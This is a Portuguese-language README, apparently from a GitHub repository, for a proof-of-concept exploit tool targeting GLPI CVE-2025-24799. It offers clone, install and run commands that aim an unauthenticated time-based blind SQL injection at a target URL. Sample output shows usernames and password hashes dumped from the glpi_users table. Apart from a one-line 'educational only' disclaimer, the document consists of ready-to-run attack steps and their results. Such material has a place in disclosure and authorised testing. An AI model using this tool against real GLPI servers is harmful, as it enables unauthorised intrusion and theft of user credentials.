
Explora o GLPI CVE-2025-24799 via injeção SQL cega baseada em tempo não autenticada para extrair nomes de usuário e hashes de senha de glpi_users para testes de segurança autorizados.
CVE-2025-24799 é um exploit de prova de conceito (PoC) direcionado ao GLPI.
Este exploit demonstra Injeção SQL não autenticada (cega baseada em tempo) para extrair credenciais de usuário.
Aviso: Este PoC é apenas para fins educacionais. Não use em sistemas sem permissão.
glpi_users e as colunas necessárias (name e password)git clone https://github.com/Rosemary1337/CVE-2025-24799.git
cd CVE-2025-24799
pip install -r requirements.txt
Requisitos:
requests,colorama,beautifulsoup4
python3 main.py -u <TARGET_URL>
python3 main.py -u http://target.com/index.php/ajax
| Flag | Descrição | Obrigatório | Padrão |
|---|---|---|---|
-u, --url | URL alvo | Sim | - |
O console mostra:
[•][✔][✖][i]Exemplo:
[•] Exploiting CVE-2025-24799...
[✔] Table 'glpi_users' found.
[✔] Required columns verified.
[i] Starting credential extraction...
[+] Credential 1: admin:5f4dcc3b5aa765d61d8327deb882cf99
[+] Credential 2: user:123456
[*] Extraction complete.
Sou um desenvolvedor ativo que gosta de criar ferramentas e compartilhar conhecimento. Você pode entrar em contato comigo através de: